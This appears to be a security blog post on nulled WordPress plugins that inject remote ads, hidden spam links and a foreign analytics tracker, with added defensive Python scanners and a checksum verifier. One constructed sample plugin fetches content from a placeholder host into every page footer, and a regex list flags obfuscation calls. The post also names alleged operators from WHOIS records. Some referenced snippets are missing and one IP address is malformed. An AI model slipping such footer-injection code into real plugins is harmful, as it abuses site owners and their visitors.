Nulled WordPress Themes: Malvertising and Black Hat SEO
This time I'll tell you another story that combines all of the problems above: nulled plugins, black hat SEO, malvertising, and a software developer who turned to the dark side. The head of our remediation team, Bruno Zanelato, recently cleaned a website and found this piece of code in a WordPress plugin:
As a result, content fetched from cdn.gomafia[.]com was injected at the bottom of every page of the site. The injected code varies (the ad scripts use different keywords or phrases), but you can always identify these three main parts: Displaying other people's ads on your site is probably not what you expected when you installed a plugin.
After the ad script you see a block of spammy links pointing to gomafia[.]com and three other sites. Because of this tag, the link block is not visible on compromised sites: Let's get back to the PHP code we found in the plugin. In addition to pgma_footer, it also defines this pgma_styles function (used in the wp_enqueue_scripts hook):
wp_enqueue_style('gomafia', plugin_dir_url(__FILE__).'gma.css');
This WordPress function causes the gma.css style sheet from the plugin's directory to be included on every page.
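A static triage of plugin source for the three ingredients just described (a wp_footer hook, a fetch of remote content, and an enqueued stylesheet), as an added example written for this article and not code from the original post or from any plugin it names. The two plugin sources it scans are constructed; the indicator patterns, the .invalid hostname and the function names eg_footer, eg_styles and ec_footer are assumptions, not anything taken from the GoMafia code.

```python
"""Static triage of WordPress plugin PHP source for footer-injection patterns.

Added example, not code from the original post or from any plugin it names.
It flags the ingredients the post describes: a wp_footer hook, a remote content
fetch and an enqueued stylesheet. Both plugin sources below are constructed.
"""
import re
from dataclasses import dataclass

# Indicators as (label, regex) pairs. The patterns are deliberately loose:
# the goal is to surface files for a human read, not to prove them malicious.
INDICATORS = [
    ("footer_hook", re.compile(r"add_action\s*\(\s*['\"]wp_footer['\"]")),
    ("enqueue_hook", re.compile(r"add_action\s*\(\s*['\"]wp_enqueue_scripts['\"]")),
    ("remote_fetch", re.compile(
        r"\b(file_get_contents|curl_init|wp_remote_get|wp_remote_retrieve_body|fopen)\s*\(")),
    ("remote_url", re.compile(r"https?://[\w.-]+", re.I)),
    ("enqueue_style", re.compile(r"wp_enqueue_style\s*\(")),
    ("obfuscation", re.compile(r"\b(base64_decode|gzinflate|str_rot13|eval)\s*\(")),
]


@dataclass
class Finding:
    line: int
    label: str
    text: str


def scan_php(source: str, own_domains=()):
    """Return findings for one PHP file. Hosts in own_domains are not flagged as remote_url."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, rx in INDICATORS:
            for m in rx.finditer(line):
                if label == "remote_url":
                    host = m.group(0).split("://", 1)[1]
                    if host in own_domains:
                        continue
                findings.append(Finding(lineno, label, line.strip()))
    return findings


def risk_summary(findings):
    """A footer hook plus a remote fetch plus a remote URL is the pattern worth a manual read."""
    labels = {f.label for f in findings}
    suspect = {"footer_hook", "remote_fetch", "remote_url"} <= labels
    return {"labels": sorted(labels), "footer_injection_suspect": suspect}


# Constructed sample: fetches remote content into every page footer (hypothetical names).
SAMPLE_PLUGIN = r"""<?php
/* Plugin Name: Example Gallery (constructed sample, not a real plugin) */
function eg_footer() {
    // fetches and echoes remote content into every page footer
    echo file_get_contents('http://cdn.example-nulled.invalid/footer.txt');
}
add_action('wp_footer', 'eg_footer');
function eg_styles() {
    wp_enqueue_style('eg', plugin_dir_url(__FILE__).'eg.css');
}
add_action('wp_enqueue_scripts', 'eg_styles');
"""

# Constructed sample: a footer hook that only echoes static markup, which is normal.
BENIGN_PLUGIN = r"""<?php
/* Plugin Name: Example Credits (constructed sample, not a real plugin) */
function ec_footer() {
    echo '<p class="credits">Powered by Example</p>';
}
add_action('wp_footer', 'ec_footer');
"""

if __name__ == "__main__":
    for f in scan_php(SAMPLE_PLUGIN):
        print(f"line {f.line:>3} {f.label:<15} {f.text}")
    print(risk_summary(scan_php(SAMPLE_PLUGIN)))
    print(risk_summary(scan_php(BENIGN_PLUGIN)))
```

Running scan_php over every .php file under wp-content/plugins (os.walk) gives a quick first pass; a footer hook next to a remote fetch deserves a manual read, while a footer hook that only echoes static markup, as in the second sample, is ordinary plugin behaviour. The own_domains allowlist keeps a plugin's legitimate calls to its own update server from being reported as a remote URL.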
Now it's clear what makes the link block invisible. Besides ads and spammy links, the malware injects a Google Analytics tracker with ID UA-5133396-16 into every compromised web page (it's possible to have more than one tracker on the same page). This lets the attackers see page views and ad impressions across all compromised websites.
The Google Analytics tracker could also help the attackers verify themselves as owners of the compromised websites in Google Search Console. We have no evidence that the attacker actually tried to do this, but we can't rule it out, since other malicious campaigns have verified themselves as owners of compromised websites in Search Console.
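An audit of a rendered page for the two things the post says end up in the HTML, an analytics tracker that isn't the site's own and a hidden block of links to other people's sites, as an added example not from the original post. The HTML is constructed: UA-5133396-16 is the tracker ID reported above, while UA-12345678-1 and the .invalid hostnames are placeholders standing in for the site's own tracker and the spam targets.

```python
"""Audit rendered HTML for foreign analytics trackers and hidden link blocks.

Added example, not from the original post. The HTML below is constructed;
UA-5133396-16 is the tracker ID the post reports, UA-12345678-1 and the
.invalid hostnames are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Universal Analytics (UA-xxxx-y) and GA4 (G-XXXXXXXX) measurement IDs.
GA_ID = re.compile(r"\b(UA-\d{4,10}-\d{1,4}|G-[A-Z0-9]{6,12})\b")


class LinkBlockParser(HTMLParser):
    """Collects <a href> targets that sit inside an element hidden via inline style."""

    def __init__(self):
        super().__init__()
        self.hidden_depth = 0   # > 0 while inside a hidden container
        self.hidden_links = []
        self.stack = []         # (tag, was_hidden) for every open element

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if tag == "a" and self.hidden_depth > 0 and a.get("href"):
            self.hidden_links.append(a["href"])
        if hidden:
            self.hidden_depth += 1
        self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed void elements.
        while self.stack:
            t, hidden = self.stack.pop()
            if hidden:
                self.hidden_depth -= 1
            if t == tag:
                break


def audit_page(html, allowed_tracker_ids=(), site_host=""):
    """Report tracker IDs not on the allowlist and hidden links to other hosts."""
    foreign = sorted(set(GA_ID.findall(html)) - set(allowed_tracker_ids))
    parser = LinkBlockParser()
    parser.feed(html)
    external = set()
    for href in parser.hidden_links:
        host = urlparse(href).hostname or ""
        if host and host != site_host:
            external.add(host)
    return {"foreign_tracker_ids": foreign, "hidden_external_links": sorted(external)}


# Constructed page: the site's own tracker, then an injected second tracker and a
# hidden link block of the kind the post describes (placeholder hostnames).
SAMPLE_HTML = """<html><head>
<script>ga('create', 'UA-12345678-1', 'auto');</script>
</head><body>
<p>Site content</p>
<script>ga('create', 'UA-5133396-16', 'auto'); ga('send', 'pageview');</script>
<div class="hidden-links" style="display: none">
  <a href="http://nulled-themes.invalid/">nulled themes</a>
  <a href="http://example-coupons.invalid/">coupons</a>
</div>
<a href="https://my-site.invalid/about">About</a>
</body></html>"""

if __name__ == "__main__":
    print(audit_page(SAMPLE_HTML, allowed_tracker_ids=("UA-12345678-1",),
                     site_host="my-site.invalid"))
```

Fetching your own front page and running it through audit_page with your real tracker ID on the allowlist is a cheap periodic check; the same comparison works against a saved copy of a page from before a plugin was installed. A link block hidden through an external stylesheet rather than an inline style (the gma.css case above) will not be caught by the inline-style check, so the stylesheets a plugin enqueues deserve a look as well.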
Who is GoMafia anyway? When we found the malicious code in the plugin, the first question was whether it was part of the actual plugin or whether the plugin had been tampered with. Because it was a premium plugin, it was hard to obtain its original source for comparison. Besides, premium plugins rarely (if ever) resort to such tricks; their authors monetize their work directly by selling the plugins.
Opening the gomafia[.]com site answered the question about the source of the malicious code. The site offers a selection of "nulled" themes and plugins, mostly from CodeCanyon. To test our assumption, we downloaded a few themes and plugins from the site. They all contained the gma_footer code that injects the contents of hxxp://cdn.gomafia[.]com into web pages of the sites they are installed on.
It's worth noting that the gomafia[.]com site itself uses the same ad script that generates annoying (and often malicious) pop-ups and pop-unders. In addition, their download links go through adf[.]ly interstitial pages that display ads before redirecting to the real page. Digging a little further, we can find some other interesting information about the people behind this GoMafia black hat campaign.
WHOIS records show that the gomafia[.]com domain was registered only a few months ago, on March 8, 2016, by Viji Sathish from the state of Tamil Nadu in India. Checking the WHOIS for the other three sites in the spammy link block, we find that they all have exactly the same registrant address, but are registered to "Sathishkumar M".
Although the four sites in the spammy link block look different at first sight (nulled software, interior design, coupons and porn), they all belong to the same people, and GoMafia injects this link block into third parties' web pages to promote its own resources, not someone else's.
Let's see what else these four sites have in common. kenzest[.]com and coupontwit[.]com (one of the spammy links) are hosted on the same server (IP starting with 192). Most of the sites (including gomafia[.]com) are behind CloudFlare, which makes it hard to see their actual IP address.
However, if we point gomafia[.]com in our /etc/hosts to 192.21.192, we find that the GoMafia site is actually hosted on the same server as kenzest[.]com. We also find the same postal address and phone number on its contact page as on the gomafia[.]com about page.
It seems that Sathish was still looking for a good use for his programming skills. Probably their white hat businesses weren't very successful, so they eventually started exploring the dark side of web marketing: porn, intrusive ads, malvertising, illegal content, piracy, nulled software, and abuse of third parties' websites.
Kenzest Technologies also offers search engine optimization (SEO) services. gomafia[.]com is just part of their SEO strategy: get as many sites as possible to install their nulled plugins. As a proof of concept, they add links to their own sites and monitor the results. Once they have reached a certain level of coverage on compromised websites and find paying customers interested in the service, they can replace their own links with their customers' links.
Meanwhile, they are trying to monetize the GoMafia project with (intrusive and often malicious) ads: on their own sites, in download links, and on the websites they infect. Given the choices they have made so far, they could easily replace the hidden cdn.gomafia[.]com link and ads with more serious malware once they figure out how to monetize it.
Or they could put a backdoor and malware directly into the nulled plugin, as many similar sites do. Once again, this story shows why it's always a bad idea to install "free" premium software on your website, and what motivates people to provide such "nulled" themes and plugins "for free".
It's simply a crime-based business scheme where, instead of paying the suppliers directly, you pay with your website and your visitors, giving the suppliers the opportunity to abuse both. In fact, any third-party component you install on your website can potentially introduce security problems such as backdoors, viruses, malware, spam, or simply exploitable vulnerabilities.
Ask yourself these questions whenever you install something: Does my website really need this piece of software? Can I trust the source I got it from? To minimize risk, use free, popular software from official repositories such as the WordPress Plugin Directory or Theme Directory, where many people download and test it every day.
Another option is to buy premium products directly from their developer or an authorized distributor. That way you support the developer and make sure you get the genuine, unmodified product.
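One concrete way to check that what is installed is the genuine, unmodified product is to compare the plugin directory against a manifest of known-good file hashes, as in this added example, which is not code from the original post or from WordPress. The manifest format (relative path mapped to a SHA-256 hex digest), the sample plugin files and the tampering simulated in demo() are all constructed; in practice the reference hashes come from the vendor's release archive, or for wordpress.org plugins from WP-CLI's wp plugin verify-checksums.

```python
"""Verify an installed plugin directory against a known-good checksum manifest.

Added example, not from the original post or from WordPress itself. The manifest
format (relative path -> sha256 hex), the sample plugin and the tampering in
demo() are constructed.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large assets do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(plugin_dir):
    """Hash every file under plugin_dir, keyed by forward-slash relative path."""
    manifest = {}
    for root, _dirs, files in os.walk(plugin_dir):
        for name in files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, plugin_dir).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify_plugin(plugin_dir, reference):
    """Compare plugin_dir with the reference manifest.

    Modified files are where injected code usually lives; added files are where
    a dropped-in stylesheet or backdoor would show up; missing files may mean a
    stripped licence check.
    """
    actual = build_manifest(plugin_dir)
    modified = sorted(p for p in reference if p in actual and actual[p] != reference[p])
    added = sorted(set(actual) - set(reference))
    missing = sorted(set(reference) - set(actual))
    return {"modified": modified, "added": added, "missing": missing,
            "clean": not (modified or added or missing)}


def demo():
    """Build a clean constructed plugin, record its manifest, tamper with it, re-verify."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = os.path.join(tmp, "example-plugin")
        os.makedirs(os.path.join(plugin, "css"))
        files = {
            "example-plugin.php": "<?php\n// constructed sample plugin\nfunction ep_init() {}\n",
            "css/style.css": "body { margin: 0; }\n",
        }
        for rel, content in files.items():
            with open(os.path.join(plugin, rel), "w") as f:
                f.write(content)
        reference = build_manifest(plugin)   # stands in for the vendor's manifest
        assert verify_plugin(plugin, reference)["clean"]

        # Simulate a nulled copy: a footer hook appended, an extra stylesheet dropped in.
        with open(os.path.join(plugin, "example-plugin.php"), "a") as f:
            f.write("add_action('wp_footer', 'ep_footer');\n")
        with open(os.path.join(plugin, "css", "extra.css"), "w") as f:
            f.write(".hidden-links { display: none; }\n")
        return verify_plugin(plugin, reference)


if __name__ == "__main__":
    print(demo())
```

The manifest has to come from a source you trust independently of the installed copy: hashing the files you just downloaded from a "nulled" site and then verifying against that manifest proves nothing. Keeping the manifest of a vendor-supplied archive in version control and re-running verify_plugin after each update also catches later modifications by a compromised server.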